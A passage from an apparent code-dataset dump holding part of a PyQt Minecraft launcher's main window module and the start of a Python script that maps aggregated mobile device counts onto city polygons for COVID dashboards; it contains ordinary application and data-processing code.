versionItem.setFlags(versionItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n\n installButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"Install\"))\n\n installButton.clicked.connect(self.installButtonClicked)\n\n self.insertRow(count)\n self.setItem(count, 0, versionItem)\n self.setCellWidget(count, 1, installButton)\n\n count += 1\n\n def installFabricVersion(self, fabricVersion: str):\n self.mainWindow.installThread.setupFabricInstallation(fabricVersion)\n self.mainWindow.installThread.start()\n\n self.mainWindow.setInstallButtonsEnabled(False)\n\n def installButtonClicked(self):\n for i in range(self.rowCount()):\n if self.cellWidget(i, 1) == self.sender():\n self.installFabricVersion(self.item(i, 0).text())\n return\n\n def setButtonsEnabled(self, enabled: bool):\n for i in range(self.rowCount()):\n self.cellWidget(i, 1).setEnabled(enabled)\n\n\nclass SwitchAccountButton(QPushButton):\n def __init__(self, text: str, env: Environment, pos: int):\n self.env = env\n self.pos = pos\n super().__init__(text)\n self.clicked.connect(self.clickCallback)\n\n def clickCallback(self):\n account = self.env.accountList[self.pos]\n if not self.env.offlineMode:\n try:\n self.env.account = getAccountDict(minecraft_launcher_lib.microsoft_account.complete_refresh(self.env.secrets.client_id, self.env.secrets.secret, self.env.secrets.redirect_url, account[\"refreshToken\"]))\n self.env.mainWindow.updateAccountInformation()\n self.env.selectedAccount = self.pos\n except minecraft_launcher_lib.exceptions.InvalidRefreshToken:\n self.env.loginWindow.reset()\n self.env.loginWindow.show()\n else:\n self.env.account = self.env.accountList[self.pos]\n self.env.mainWindow.updateAccountInformation()\n self.env.selectedAccount = self.pos\n\n\nclass AccountTab(QTableWidget):\n def __init__(self, env: Environment):\n super().__init__(0, 2)\n self.env = env\n\n self.setSelectionBehavior(QAbstractItemView.SelectionBehavior.SelectRows)\n self.setHorizontalHeaderLabels((QCoreApplication.translate(\"MainWindow\", \"Name\"), QCoreApplication.translate(\"MainWindow\", \"Switch\")))\n self.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeMode.Stretch)\n self.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n self.verticalHeader().hide()\n self.updateAccountList()\n\n def updateAccountList(self):\n self.setRowCount(0)\n count = 0\n for i in self.env.accountList:\n nameItem = QTableWidgetItem(i[\"name\"])\n nameItem.setFlags(nameItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n button = SwitchAccountButton(QCoreApplication.translate(\"MainWindow\", \"Switch\"), self.env,count)\n self.insertRow(count)\n self.setItem(count, 0, nameItem)\n self.setCellWidget(count, 1, button)\n count += 1\n\n def addAccount(self):\n self.env.loginWindow.reset()\n self.env.loginWindow.show()\n\n def contextMenuEvent(self, event):\n menu = QMenu(self)\n\n addAccountAction = QAction(QCoreApplication.translate(\"MainWindow\", \"New Account\"), self)\n addAccountAction.triggered.connect(self.addAccount)\n menu.addAction(addAccountAction)\n\n menu.popup(QCursor.pos())\n\nclass AboutTab(QWidget):\n def __init__(self, env: Environment):\n super().__init__()\n\n self.titleLabel = QLabel(\"jdMinecraftLauncher \" + env.launcherVersion)\n self.fanmadeLabel = QLabel(QCoreApplication.translate(\"MainWindow\", \"This Launcher is fanmade and not from Mojang/Microsoft\"))\n self.dependencyLabel = QLabel(QCoreApplication.translate(\"MainWindow\", \"This Program uses minecraft-launcher-lib 
{{version}}\").replace(\"{{version}}\", minecraft_launcher_lib.utils.get_library_version()))\n self.licenseLabel = QLabel(QCoreApplication.translate(\"MainWindow\", \"This Program is licensed under GPL 3.0\"))\n self.viewSourceButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"View Source\"))\n copyrightLabel = QLabel(\"Copyright © 2019-2023 JakobDev\")\n\n self.viewSourceButton.clicked.connect(lambda: webbrowser.open(\"https://codeberg.org/JakobDev/jdMinecraftLauncher\"))\n\n self.titleLabel.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.fanmadeLabel.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.dependencyLabel.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.licenseLabel.setAlignment(Qt.AlignmentFlag.AlignCenter)\n copyrightLabel.setAlignment(Qt.AlignmentFlag.AlignCenter)\n\n self.mainLayout = QGridLayout()\n self.mainLayout.addWidget(QLabel(),0,0)\n self.mainLayout.addWidget(QLabel(),0,2)\n self.mainLayout.addWidget(self.titleLabel,0,1)\n self.mainLayout.addWidget(self.fanmadeLabel,1,1)\n self.mainLayout.addWidget(self.dependencyLabel,2,1)\n self.mainLayout.addWidget(self.licenseLabel,3,1)\n self.mainLayout.addWidget(copyrightLabel, 4, 1)\n self.mainLayout.addWidget(self.viewSourceButton, 5, 1)\n self.setLayout(self.mainLayout)\n\n\nclass GameOutputTab(QPlainTextEdit):\n def __init__(self, env: Environment) -> None:\n super().__init__()\n self.env = env\n self.setLineWrapMode(QPlainTextEdit.LineWrapMode.NoWrap)\n self.setReadOnly(True)\n\n def dataReady(self) -> None:\n cursor = self.textCursor()\n cursor.movePosition(cursor.MoveOperation.End)\n cursor.insertText(bytes(self.process.readAll()).decode(encoding=sys.stdout.encoding,errors=\"replace\"))\n self.moveCursor(cursor.MoveOperation.End)\n\n def procStarted(self) -> None:\n if self.profile.launcherVisibility != 2:\n self.env.mainWindow.hide()\n self.env.mainWindow.playButton.setEnabled(self.env.settings.get(\"enableMultiLaunch\"))\n\n def procFinish(self) -> None:\n if self.profile.launcherVisibility == 0:\n self.env.mainWindow.show()\n self.env.mainWindow.setFocus()\n elif self.profile.launcherVisibility == 1:\n self.env.mainWindow.close()\n self.env.mainWindow.playButton.setEnabled(True)\n if self.natives_path != \"\":\n try:\n shutil.rmtree(self.natives_path)\n except Exception:\n pass\n\n def executeCommand(self,profile: Profile, command: List[str], natives_path: str) -> None:\n self.profile = profile\n self.natives_path = natives_path\n self.process = QProcess(self)\n self.process.setWorkingDirectory(self.env.minecraftDir)\n self.process.readyRead.connect(self.dataReady)\n self.process.started.connect(self.procStarted)\n self.process.finished.connect(self.procFinish)\n self.process.start(command[0], command[1:])\n\n if not self.process.waitForStarted():\n self.setPlainText(QCoreApplication.translate(\"MainWindow\", \"Failed to start Minecraft\"))\n QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"Failed to start\"), QCoreApplication.translate(\"MainWindow\", \"Minecraft could not be started. 
Maybe you use a invalid Java executable.\"))\n self.env.mainWindow.playButton.setEnabled(True)\n return\n\n\nclass Tabs(QTabWidget):\n def __init__(self, env: Environment, parent: \"MainWindow\"):\n super().__init__()\n QWebEngineProfile.defaultProfile().setHttpAcceptLanguage(QLocale.system().name())\n QWebEngineProfile.defaultProfile().setHttpUserAgent(\"jdMinecraftLauncher/\" + env.launcherVersion)\n webView = QWebEngineView()\n webView.load(QUrl(env.settings.get(\"newsURL\")))\n self.addTab(webView, QCoreApplication.translate(\"MainWindow\", \"News\"))\n self.profileEditor = ProfileEditorTab(env, parent)\n self.addTab(self.profileEditor, QCoreApplication.translate(\"MainWindow\", \"Profile Editor\"))\n self.versionTab = VersionEditorTab(env)\n self.addTab(self.versionTab, QCoreApplication.translate(\"MainWindow\", \"Version Editor\"))\n self.options = OptionsTab(env)\n self.addTab(self.options, QCoreApplication.translate(\"MainWindow\", \"Options\"))\n if not env.offlineMode:\n self.forgeTab = ForgeTab(env, parent)\n self.addTab(self.forgeTab, \"Forge\")\n self.fabricTab = FabricTab(env, parent)\n self.addTab(self.fabricTab, \"Fabric\")\n self.accountTab = AccountTab(env)\n self.addTab(self.accountTab, QCoreApplication.translate(\"MainWindow\", \"Account\"))\n about = AboutTab(env)\n self.addTab(about, QCoreApplication.translate(\"MainWindow\", \"About\"))\n\n def updateProfiles(self):\n self.profileEditor.updateProfiles()\n\nclass MainWindow(QWidget):\n def __init__(self, env: Environment):\n super().__init__()\n self.env = env\n self.profileListRebuild = False\n self.tabWidget = Tabs(env, self)\n self.profileWindow = ProfileWindow(self.env,self)\n self.progressBar = QProgressBar()\n self.profileComboBox = QComboBox()\n self.profilLabel = QLabel(QCoreApplication.translate(\"MainWindow\", \"Profile:\"))\n self.newProfileButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"New Profile\"))\n self.editProfileButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"Edit Profile\"))\n self.playButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"Play\"))\n self.accountLabel = QLabel()\n self.accountButton = QPushButton(QCoreApplication.translate(\"MainWindow\", \"Logout\"))\n\n self.progressBar.setTextVisible(True)\n self.profileComboBox.setCurrentIndex(self.env.selectedProfile)\n self.playButton.setSizePolicy(QSizePolicy(QSizePolicy.Policy.Preferred,QSizePolicy.Policy.Minimum))\n\n self.newProfileButton.clicked.connect(self.newProfileButtonClicked)\n self.editProfileButton.clicked.connect(self.editProfileButtonClicked)\n self.playButton.clicked.connect(self.playButtonClicked)\n self.accountButton.clicked.connect(self.logoutButtonClicked)\n self.profileComboBox.currentIndexChanged.connect(self.profileComboBoxIndexChanged)\n\n self.profileSelectLayout = QHBoxLayout()\n self.profileSelectLayout.addWidget(self.profilLabel)\n self.profileSelectLayout.addWidget(self.profileComboBox)\n\n self.profileButtonsLayout = QHBoxLayout()\n self.profileButtonsLayout.addWidget(self.newProfileButton)\n self.profileButtonsLayout.addWidget(self.editProfileButton)\n\n self.profileLayout = QVBoxLayout()\n self.profileLayout.addLayout(self.profileSelectLayout)\n self.profileLayout.addLayout(self.profileButtonsLayout)\n\n self.accountLayout = QVBoxLayout()\n self.accountLayout.addWidget(self.accountLabel)\n self.accountLayout.addWidget(self.accountButton)\n\n self.barLayout = QHBoxLayout()\n self.barLayout.addLayout(self.profileLayout)\n self.barLayout.addWidget(self.playButton)\n 
self.barLayout.addLayout(self.accountLayout)\n\n self.mainLayout = QVBoxLayout()\n self.mainLayout.addWidget(self.tabWidget)\n self.mainLayout.addWidget(self.progressBar)\n self.mainLayout.addLayout(self.barLayout)\n\n self.updateProfileList()\n \n self.setWindowTitle(\"jdMinecraftLauncher\")\n self.setLayout(self.mainLayout)\n\n self.installThread = InstallThread(env)\n self.installThread.text.connect(lambda text: self.progressBar.setFormat(text))\n self.installThread.progress.connect(lambda progress: self.progressBar.setValue(progress))\n self.installThread.progress_max.connect(lambda progress_max: self.progressBar.setMaximum(progress_max))\n self.installThread.finished.connect(self.installFinish)\n\n self._is_first_open = False\n\n def openMainWindow(self):\n if self._is_first_open:\n self.show()\n return\n\n if platform.system() == \"Linux\":\n from jdMinecraftLauncher.DBusService import DBusService\n DBusService(self.env, self.env.app)\n\n if self.env.args.launch_profile:\n profile = self.env.profileCollection.getProfileByName(self.env.args.launch_profile)\n if profile:\n self.env.mainWindow.launchProfile(profile)\n else:\n QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"Profile not found\"), QCoreApplication.translate(\"MainWindow\", \"The given Profile was not found\"))\n elif self.env.args.url:\n parse_results = urllib.parse.urlparse(self.env.args.url)\n if parse_results.scheme == \"jdminecraftlauncher\":\n self._handleCustomURL(parse_results.path)\n\n self._is_first_open = True\n self.show()\n\n def _handleCustomURL(self, args: str) -> None:\n try:\n method, param = args.split(\"/\", 1)\n except ValueError:\n return\n\n if method == \"LaunchProfileByID\":\n profile = self.env.profileCollection.getProfileByID(param)\n if profile:\n self.env.profileCollection.mainWindow.launchProfile(profile)\n else:\n QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"Profile not found\"), QCoreApplication.translate(\"MainWindow\", \"The given Profile was not found\"))\n elif method == \"LaunchProfileByName\":\n profile = self.profileCollection.env.getProfileByName(param)\n if profile:\n self.env.mainWindow.launchProfile(profile)\n else:\n QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"Profile not found\"), QCoreApplication.translate(\"MainWindow\", \"The given Profile was not found\"))\n\n def updateProfileList(self):\n currentIndex = 0\n self.profileListRebuild = True\n self.profileComboBox.clear()\n for count, i in enumerate(self.env.profileCollection.profileList):\n self.profileComboBox.addItem(i.name)\n if i.id == self.env.profileCollection.selectedProfile:\n currentIndex = count\n self.tabWidget.updateProfiles()\n self.profileComboBox.setCurrentIndex(currentIndex)\n self.profileListRebuild = False\n\n def profileComboBoxIndexChanged(self, index: int):\n if not self.profileListRebuild:\n self.env.profileCollection.selectedProfile = self.env.profileCollection.profileList[index].id\n \n def newProfileButtonClicked(self):\n self.profileWindow.loadProfile(self.env.profileCollection.getSelectedProfile(), True, True)\n self.profileWindow.exec()\n\n def editProfileButtonClicked(self):\n self.profileWindow.loadProfile(self.env.profileCollection.getSelectedProfile(), False)\n self.profileWindow.exec()\n\n def launchProfile(self, profile: Profile) -> None:\n if self.env.offlineMode:\n if os.path.isdir(os.path.join(self.env.minecraftDir,\"versions\",profile.getVersionID())):\n self.startMinecraft(profile)\n else:\n 
QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"No Internet Connection\"), QCoreApplication.translate(\"MainWindow\", \"You need a internet connection to install a new version, but you are still able to play already installed versions.\"))\n else:\n self.installVersion(profile)\n\n def playButtonClicked(self):\n self.launchProfile(self.env.profileCollection.getSelectedProfile())\n\n def logoutButtonClicked(self):\n if self.env.offlineMode:\n QMessageBox.critical(self, QCoreApplication.translate(\"MainWindow\", \"No Internet Connection\"), QCoreApplication.translate(\"MainWindow\", \"This Feature needs a internet connection\"))\n return\n del self.env.accountList[self.env.selectedAccount]\n if len(self.env.accountList) == 0:\n self.hide()\n self.env.loginWindow.show()\n self.env.loginWindow.setFocus()\n else:\n self.env.account = self.env.accountList[0]\n self.updateAccountInformation()\n\n def startMinecraft(self, profile: Profile):\n if self.env.settings.get(\"extractNatives\"):\n natives_path = os.path.join(tempfile.gettempdir(), \"minecraft_natives_\" + str(random.randrange(0, 10000000)))\n else:\n natives_path = \"\"\n args = getMinecraftCommand(self.env.profileCollection.getSelectedProfile(), self.env, natives_path)\n o = GameOutputTab(self.env)\n tabid = self.tabWidget.addTab(o, QCoreApplication.translate(\"MainWindow\", \"Game Output\"))\n self.tabWidget.setCurrentIndex(tabid)\n o.executeCommand(profile,args,natives_path)\n\n def installFinish(self) -> None:\n if self.installThread.getError() is not None:\n text = QCoreApplication.translate(\"MainWindow\", \"Due to an error, the installation could not be completed\") + \"

\"\n text += QCoreApplication.translate(\"MainWindow\", \"This may have been caused by a network error\")\n\n msgBox = QMessageBox()\n msgBox.setWindowTitle(QCoreApplication.translate(\"MainWindow\", \"Installation failed\"))\n msgBox.setText(text)\n msgBox.setDetailedText(self.installThread.getError())\n msgBox.exec()\n\n self.progressBar.setValue(0)\n self.progressBar.setFormat(\"\")\n self.setInstallButtonsEnabled(True)\n\n return\n\n if self.installThread.shouldStartMinecraft() and self.installThread.getError() is None:\n self.env.updateInstalledVersions()\n self.tabWidget.versionTab.updateVersions()\n self.startMinecraft(self.env.current_running_profile)\n else:\n self.env.loadVersions()\n self.profileWindow.updateVersionsList()\n self.setInstallButtonsEnabled(True)\n\n def installVersion(self, profile: Profile):\n self.env.current_running_profile = profile\n self.playButton.setEnabled(False)\n self.installThread.setup(profile)\n self.installThread.start()\n\n def updateAccountInformation(self):\n self.accountLabel.setText(QCoreApplication.translate(\"MainWindow\", \"Welcome, {{name}}\").replace(\"{{name}}\", self.env.account[\"name\"]))\n self.tabWidget.accountTab.updateAccountList()\n if self.env.offlineMode:\n self.playButton.setText(QCoreApplication.translate(\"MainWindow\", \"Play Offline\"))\n else:\n self.playButton.setText(QCoreApplication.translate(\"MainWindow\", \"Play\"))\n\n def setInstallButtonsEnabled(self, enabled: bool):\n self.playButton.setEnabled(enabled)\n self.tabWidget.forgeTab.setButtonsEnabled(enabled)\n self.tabWidget.fabricTab.setButtonsEnabled(enabled)\n\n def closeEvent(self,event):\n if self.env.args.dont_save_data:\n event.accept()\n sys.exit(0)\n\n options = self.tabWidget.options\n self.env.profileCollection.save()\n self.env.settings.set(\"language\", options.languageComboBox.currentData())\n self.env.settings.set(\"newsURL\", options.urlEdit.text())\n self.env.settings.set(\"enableMultiLaunch\", options.allowMultiLaunchCheckBox.isChecked())\n self.env.settings.set(\"extractNatives\", options.extractNativesCheckBox.isChecked())\n self.env.settings.save(os.path.join(self.env.dataDir, \"settings.json\"))\n with open(os.path.join(self.env.dataDir, \"microsoft_accounts.json\"),\"w\") as f:\n data = {}\n data[\"selectedAccount\"] = self.env.selectedAccount\n data[\"accountList\"] = []\n for count, i in enumerate(self.env.accountList):\n if i[\"name\"] in self.env.disableAccountSave:\n if count == data[\"selectedAccount\"]:\n data[\"selectedAccount\"] = 0\n else:\n data[\"accountList\"].append(i)\n json.dump(data, f, ensure_ascii=False, indent=4)\n event.accept()\n sys.exit(0)\n","repo_name":"JakobDev/jdMinecraftLauncher","sub_path":"jdMinecraftLauncher/gui/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":33462,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"20120857726","text":"import json\nimport logging\nimport os\nimport pprint\nimport sys\nimport tempfile\n\nfrom db_utils import minio_utils\nimport geopandas\nimport numpy\nimport pandas\n\nimport city_map_layers_to_minio\n\nMINIO_COVID_BUCKET = \"covid\"\nMINIO_HEX_BUCKET = \"city-hexes.polygons\"\nMINIO_EDGE_CLASSIFICATION = minio_utils.DataClassification.EDGE\nMINIO_LAKE_CLASSIFICATION = minio_utils.DataClassification.LAKE\n\nDATA_PUBLIC_PREFIX = \"data/public/\"\nDATA_RESTRICTED_PREFIX = \"data/private/\"\n\nCT_MOBILE_METRICS = \"data/private/ct_mobile_device_count_metrics.csv\"\nTIMESTAMP_COL = 
\"timestamp\"\nHOURLY_METRIC_POLYGON_ID = \"polygon_id\"\nUPTIME_COL_PREFIX = \"Uptime_\"\nDOWNTIME_COL_PREFIX = \"Downtime_\"\nDESCRIBE_COL_SUFFIXES = [\"25%\", \"50%\", \"75%\", \"count\", \"max\", \"mean\", \"min\", \"std\"]\nPLOT_COL_SUFFIXES = [\"50%\"]\n\nPOLYGON_ID_COL = \"id\"\n\nDEVICE_COUNT_THRESHOLD = 50\nTEMPORAL_FILTER_WINDOW = pandas.Timedelta(days=28)\n\nCT_VODACOM_POLYGONS = \"ct_vodacom_polygons.geojson\"\nCT_HEX_L7_FILENAME = \"city-hex-polygons-7.geojson\"\nCT_HEX_L8_FILENAME = \"city-hex-polygons-8.geojson\"\nCT_WARD_FILENAME = \"ct_wards.geojson\"\nCT_HEALTH_DISTRICT_FILENAME = \"health_districts.geojson\"\n\nWARD_MOBILE_DATA_SUFFIX = \"ward_mobile_count.geojson\"\nHEX_L7_MOBILE_DATA_SUFFIX = \"hex_l7_mobile_count.geojson\"\nHEX_L8_MOBILE_DATA_SUFFIX = \"hex_l8_mobile_count.geojson\"\nDISTRICT_MOBILE_DATA_SUFFIX = \"district_mobile_count.geojson\"\nPOLYGON_MOBILE_DATA_SUFFIX = \"polygon_mobile_count.geojson\"\n\nCHOROPLETH_LAYERS = {\n WARD_MOBILE_DATA_SUFFIX,\n HEX_L7_MOBILE_DATA_SUFFIX,\n HEX_L8_MOBILE_DATA_SUFFIX,\n DISTRICT_MOBILE_DATA_SUFFIX,\n POLYGON_MOBILE_DATA_SUFFIX,\n}\n\nCHOROPLETH_SOURCE_LAYERS = {\n HEX_L7_MOBILE_DATA_SUFFIX: CT_HEX_L7_FILENAME,\n HEX_L8_MOBILE_DATA_SUFFIX: CT_HEX_L8_FILENAME,\n WARD_MOBILE_DATA_SUFFIX: CT_WARD_FILENAME,\n DISTRICT_MOBILE_DATA_SUFFIX: CT_HEALTH_DISTRICT_FILENAME,\n POLYGON_MOBILE_DATA_SUFFIX: CT_VODACOM_POLYGONS\n}\n\nLAYER_FILES = (\n (CT_VODACOM_POLYGONS, MINIO_EDGE_CLASSIFICATION, MINIO_COVID_BUCKET, DATA_RESTRICTED_PREFIX),\n (CT_HEX_L7_FILENAME, MINIO_LAKE_CLASSIFICATION, MINIO_HEX_BUCKET, \"\"),\n (CT_HEX_L8_FILENAME, MINIO_LAKE_CLASSIFICATION, MINIO_HEX_BUCKET, \"\"),\n (CT_WARD_FILENAME, MINIO_EDGE_CLASSIFICATION, MINIO_COVID_BUCKET, DATA_PUBLIC_PREFIX),\n (CT_HEALTH_DISTRICT_FILENAME, MINIO_EDGE_CLASSIFICATION, MINIO_COVID_BUCKET, DATA_PUBLIC_PREFIX),\n)\n\nHEX_COUNT_INDEX_PROPERTY = \"index\"\nCHOROPLETH_COL_LOOKUP = {\n # filename: (col name in gdf, sanitising function)\n WARD_MOBILE_DATA_SUFFIX: (\"WardID\", lambda ward: (str(int(ward)) if pandas.notna(ward) else None)),\n HEX_L7_MOBILE_DATA_SUFFIX: (HEX_COUNT_INDEX_PROPERTY, lambda hex: hex),\n HEX_L8_MOBILE_DATA_SUFFIX: (HEX_COUNT_INDEX_PROPERTY, lambda hex: hex),\n DISTRICT_MOBILE_DATA_SUFFIX: (\"CITY_HLTH_RGN_NAME\", lambda district: district.upper()),\n POLYGON_MOBILE_DATA_SUFFIX: (\"id\", lambda polygon: polygon),\n}\n\nNORM_PREFIX = \"Norm\"\nDELTA_SUFFIX = \"Delta_\"\nRELATIVE_DELTA_PREFIX = \"RelativeDelta_\"\nRELATIVE_DELTA_PERCENT_PREFIX = \"RelativeDeltaPercent_\"\n\nCASE_MAP_PREFIX = \"widgets/private/case_count_maps/\"\n\n\ndef get_mobile_data(minio_access, minio_secret):\n with tempfile.NamedTemporaryFile() as temp_datafile:\n minio_utils.minio_to_file(\n filename=temp_datafile.name,\n minio_filename_override=CT_MOBILE_METRICS,\n minio_bucket=MINIO_COVID_BUCKET,\n minio_key=minio_access,\n minio_secret=minio_secret,\n data_classification=MINIO_EDGE_CLASSIFICATION,\n )\n\n mobile_data_df = pandas.read_csv(temp_datafile.name)\n\n for col in (TIMESTAMP_COL,):\n mobile_data_df[col] = pandas.to_datetime(mobile_data_df[col])\n\n mobile_data_df.set_index([TIMESTAMP_COL, HOURLY_METRIC_POLYGON_ID], inplace=True)\n mobile_data_df.sort_index(inplace=True)\n\n return mobile_data_df\n\n\ndef temporal_filter(mobile_data_df,\n window_start=TEMPORAL_FILTER_WINDOW, window_end=None,\n filter_start=None, filter_end=None):\n filter_start = mobile_data_df.index.get_level_values(TIMESTAMP_COL).max() if filter_start is None else filter_start\n filter_start = 
(filter_start - window_start) if window_start else filter_start\n\n filter_end = mobile_data_df.index.get_level_values(TIMESTAMP_COL).max() if filter_end is None else filter_end\n filter_end = (filter_end - window_end) if window_end else filter_end\n logging.debug(f\"Temporal filter range: {filter_start} to {filter_end}\")\n\n filter_slice = pandas.IndexSlice[filter_start:filter_end, :]\n\n return mobile_data_df.loc[filter_slice]\n\n\ndef calculate_delta_df(mobile_data_df):\n def calculate_date_delta(polygon_df):\n # Start off with the median uptime and downtime values for each polygon\n result_df = pandas.Series({**{\n UPTIME_COL_PREFIX + col: (\n polygon_df[UPTIME_COL_PREFIX + col].median()\n if polygon_df[UPTIME_COL_PREFIX + col].notna().any()\n else DEVICE_COUNT_THRESHOLD\n )\n for col in DESCRIBE_COL_SUFFIXES\n }, **{\n DOWNTIME_COL_PREFIX + col: (\n polygon_df[DOWNTIME_COL_PREFIX + col].median()\n if polygon_df[DOWNTIME_COL_PREFIX + col].notna().any()\n else DEVICE_COUNT_THRESHOLD\n )\n for col in DESCRIBE_COL_SUFFIXES\n }})\n\n # Initial delta calculation - uptime - downtime\n result_df = result_df.append(pandas.Series({\n DELTA_SUFFIX + col: result_df[UPTIME_COL_PREFIX + col] - result_df[DOWNTIME_COL_PREFIX + col]\n for col in DESCRIBE_COL_SUFFIXES\n }))\n\n # Relative delta increase - delta / downtime\n result_df = result_df.append(pandas.Series({\n RELATIVE_DELTA_PREFIX + col: result_df.loc[DELTA_SUFFIX + col] / result_df.loc[DOWNTIME_COL_PREFIX + col]\n for col in PLOT_COL_SUFFIXES\n }))\n\n # Percent increase - relative_delta*100, rounded off\n result_df = result_df.append(pandas.Series({\n RELATIVE_DELTA_PERCENT_PREFIX + col: (result_df.loc[RELATIVE_DELTA_PREFIX + col] * 100).round(0)\n for col in PLOT_COL_SUFFIXES\n }))\n\n return result_df\n\n delta_df = mobile_data_df.groupby(HOURLY_METRIC_POLYGON_ID).apply(calculate_date_delta)\n logging.debug(f\"delta_df=\\n{delta_df}\")\n\n return delta_df\n\n\ndef delta_df_to_gdf(delta_df, polygon_gdf):\n delta_gdf = polygon_gdf.merge(\n delta_df,\n left_on=POLYGON_ID_COL, right_index=True,\n validate=\"1:1\"\n )\n\n return delta_gdf\n\n\ndef remap_gdf(gdf1, gdf2, gdf1_cols):\n # Creating the source density GDF, with density measures\n source_gdf = gdf1.copy()\n for col in gdf1_cols:\n source_gdf[col] = gdf1[col] / gdf1.geometry.area\n\n remap_gdf = gdf2.copy()\n remap_gdf[\"RemapIndex\"] = gdf2.index.to_series()\n\n # Getting the intersection between the two - basically the spatial outer join of the two GDFs\n source_gdf.sindex, remap_gdf.sindex\n intersection_gdf = geopandas.overlay(\n source_gdf.to_crs(remap_gdf.crs),\n remap_gdf,\n how='intersection'\n )\n\n # Function for finding the new value for each column\n def remap_func(group_gdf):\n weights = group_gdf.geometry.area\n\n new_vals = pandas.Series(\n {\n col: numpy.average(group_gdf[col], weights=weights)\n for col in gdf1_cols\n }\n )\n\n return new_vals\n\n # Aggregating on the new GDF's index\n aggregation_df = intersection_gdf.groupby(by=\"RemapIndex\").apply(remap_func)\n aggregation_geometry = gdf2.geometry\n # Turning the density back to an absolute measure\n for col in gdf1_cols:\n aggregation_df[col] = (aggregation_df[col] * aggregation_geometry.area)\n\n if RELATIVE_DELTA_PERCENT_PREFIX in col:\n aggregation_df[col] = aggregation_df[col].round(0)\n\n new_gdf = geopandas.GeoDataFrame(aggregation_df, geometry=aggregation_geometry)\n new_gdf.index.name = gdf2.index.name\n\n return new_gdf\n\n\ndef normalise_gdf(data_gdf):\n # Normalised Values\n output_gdf = 
data_gdf.merge(\n pandas.DataFrame({**{\n NORM_PREFIX + UPTIME_COL_PREFIX + col: (data_gdf[UPTIME_COL_PREFIX + col]\n / data_gdf[UPTIME_COL_PREFIX + col].max()).round(3)\n for col in PLOT_COL_SUFFIXES\n }, **{\n NORM_PREFIX + DOWNTIME_COL_PREFIX + col: (data_gdf[DOWNTIME_COL_PREFIX + col]\n / data_gdf[DOWNTIME_COL_PREFIX + col].max()).round(3)\n for col in PLOT_COL_SUFFIXES\n }}, index=data_gdf.index),\n left_index=True, right_index=True, validate=\"one_to_one\",\n )\n\n return output_gdf\n\n\ndef compress_gdf(delta_gdf):\n # Removing what we can\n logging.debug(f\"(Before compression) delta_gdf.shape={delta_gdf.shape}\")\n delta_gdf.dropna(how=\"all\", inplace=True)\n logging.debug(f\"(After compression) delta_gdf.shape={delta_gdf.shape}\")\n\n return delta_gdf\n\n\ndef write_delta_gdf_to_disk(delta_gdf, tempdir, delta_filename):\n local_path = os.path.join(tempdir, delta_filename)\n delta_gdf.reset_index().to_file(local_path, driver='GeoJSON')\n\n return local_path, delta_gdf\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s-%(module)s.%(funcName)s [%(levelname)s]: %(message)s')\n\n # Loading secrets\n SECRETS_PATH_VAR = \"SECRETS_PATH\"\n\n if SECRETS_PATH_VAR not in os.environ:\n sys.exit(-1)\n\n secrets_path = os.environ[\"SECRETS_PATH\"]\n secrets = json.load(open(secrets_path))\n\n district_file_prefix = sys.argv[1]\n district_name = sys.argv[2]\n\n subdistrict_file_prefix = sys.argv[3]\n subdistrict_name = sys.argv[4]\n logging.info(f\"Generat[ing] map layers for '{district_name}' district, '{subdistrict_name}' subdistrict\")\n\n # Has to be in the outer scope as the tempdir is used in multiple places\n with tempfile.TemporaryDirectory() as tempdir:\n logging.info(\"G[etting] layers\")\n map_layers_dict = {\n layer: (local_path, layer_gdf)\n for layer, local_path, layer_gdf in city_map_layers_to_minio.get_layers(tempdir,\n secrets[\"minio\"][\"edge\"][\"access\"],\n secrets[\"minio\"][\"edge\"][\"secret\"],\n LAYER_FILES,\n secrets[\"minio\"][\"lake\"][\"access\"],\n secrets[\"minio\"][\"lake\"][\"secret\"],)\n }\n logging.info(\"G[ot] layers\")\n\n logging.info(\"G[etting] Mobile Data\")\n mobile_df = get_mobile_data(secrets[\"minio\"][\"edge\"][\"access\"],\n secrets[\"minio\"][\"edge\"][\"secret\"])\n logging.info(\"G[ot] Mobile Data\")\n\n logging.info(\"Temporally Filter[ing] data\")\n filtered_df = temporal_filter(mobile_df)\n logging.info(\"Temporally Filter[ed] data \")\n\n logging.info(\"Calculat[ing] delta data\")\n mobile_delta_df = calculate_delta_df(filtered_df)\n logging.info(\"Calculat[ed] delta data\")\n\n logging.info(\"Spatialis[ing] delta data\")\n _, vodacom_polygon_gdf = map_layers_dict[CT_VODACOM_POLYGONS]\n mobile_delta_gdf = delta_df_to_gdf(mobile_delta_df, vodacom_polygon_gdf)\n logging.info(\"Spatialis[ed] delta data\")\n\n # Generating choropleths based upon delta gdf\n for layer_suffix in CHOROPLETH_LAYERS:\n layer_filename = f\"{district_file_prefix}_{subdistrict_file_prefix}_{layer_suffix}\"\n\n gdf_property, sanitise_func = CHOROPLETH_COL_LOOKUP[layer_suffix]\n logging.debug(f\"gdf_property={gdf_property}\")\n\n logging.info(f\"Remapp[ing] cases for '{layer_filename}'\")\n source_layer = CHOROPLETH_SOURCE_LAYERS[layer_suffix]\n _, target_gdf = map_layers_dict[source_layer]\n target_gdf.set_index(gdf_property, inplace=True)\n\n remapped_delta_gdf = remap_gdf(mobile_delta_gdf, target_gdf,\n [col for col in mobile_delta_df.columns if col != \"geometry\"]).reset_index()\n # Ugly hack to fix issue with 
